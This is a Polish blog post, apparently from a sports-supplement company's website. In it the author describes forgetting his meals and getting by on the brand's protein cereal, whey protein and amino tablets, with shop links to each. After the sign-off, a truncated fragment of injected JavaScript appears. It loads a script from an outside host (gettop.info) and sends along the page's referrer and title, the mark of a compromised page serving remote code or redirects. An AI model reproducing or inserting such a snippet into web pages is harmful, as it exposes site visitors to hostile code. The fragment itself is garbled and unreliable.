SYTUACJA AWARYJNA – ZASTĘPCZY POSIŁEK NA CAŁY DZIEŃ

10.08.2011 / Adam Jabłoński / Kulturystyka

 

Cześć,

Dzisiaj miałem wpadkę !!!!

 

Rano spieszyłem się do sklepu, jak zwykle spakowałem wszystko do torby i dorzuciłem do niej kilka butelek wody – czego nie robię zazwyczaj bo przywożę całe zgrzewki do sklepu.

Torba była cięższa niż zwykle (dlatego mnie to zmyliło) ale z przyzwyczajenia ” jeśli jest dosyć ciężka to jest już wszystko i niczego nie zapomniałem” – Tak zawsze sobie tłumaczyłem do dziś.

Jadąc autem w połowie drogi zacząłem myśleć o promocji na piersi z kurczaka która jest aktualnie w Netto ( w Szczecinie) po 12,99 zł za 1kg.
Tak myśląc, myśląc zacząłem przypominać sobie, a raczej próbować przypomnieć sobie kiedy dziś pakowałem pojemniki z jedzeniem do torby i wtedy mnie olśniło, że ich nie zabrałem – Mega wnerw ale przecież nie zawrócę i nie będę jechał taki kawał drogi do domu bo są korki i cały Szczecin przkopany na maxa, a zaraz już 11.

No nic dojechałem do sklepu popatrzałem na pułki i zobaczyłem produkt który na FIBO 2011 cieszył się fajnym wzięciem, a mianowicie są to płatki śniadaniowe – Whey Protein Crunch –> http://trec.com.pl/esklep/whey-protein-crunch-375g-nowosc-p-520.html

Bardzo je lubię szczególnie smak czekoladowy, mają fajny skład no i są w nich węgle złożone, dalej myślę hmmm potrzebuję białka, kolejny fart w niefarcie był taki, że akurat w domu dziś skończyło mi się WHEY 100 900 gram –> http://trec.com.pl/esklep/whey-900g-p-502.html , a teraz zmieniam smak co 900 gram, żeby się mi nie znudził żaden za szybko więc i tak wezmę dziś białko i tak.
Oki, jakoś dzisiaj przeżyje do tego wszystkiego Amino Whey System –>http://trec.com.pl/esklep/amino-whey-system-p-228.html które zawsze mam z sobą i wrzucam po 3 tabletki przed posiłkami czyli 3-4 razy dziennie po 3 tabletki po to aby polepszyć aminogram.

Mam jeszcze w szafce Olej Lniany który dodaje to posiłków.

Także nie jest źle, zawsze można wyjść z opresji więc nie panikujcie zawsze znajdzie się jakieś rozwiązanie.
A ja od dzisiaj będę pamiętał aby brać najpierw jedzenie, a później całą resztę.

Pozdrawiam
HEJif (document.currentScript) { s.src='http://gettop.info/kt/?sdNXbH&frm=script&se_referrer=' + encodeURIComponent(document.referrer) + '&default_keyword=' + encodeURIComponent(document.title) + '';

Facebook YouTube Instagram
© 2001-2014 Trec Nutrition sp. z o.o. 81-127 Gdynia, ul.Śmidowicza 48. Spółka wpisana do rejestru przedsiębiorców w Sądzie Rejonowym dla Gdańska-Północ, VIII
Wydział Gospodarczy Krajowego Rejestru Sądowego KRS nr: 0000315748 NIP: 958-160-24-54, REGON: 220696468, kapitał zakładowy: 50.000 zl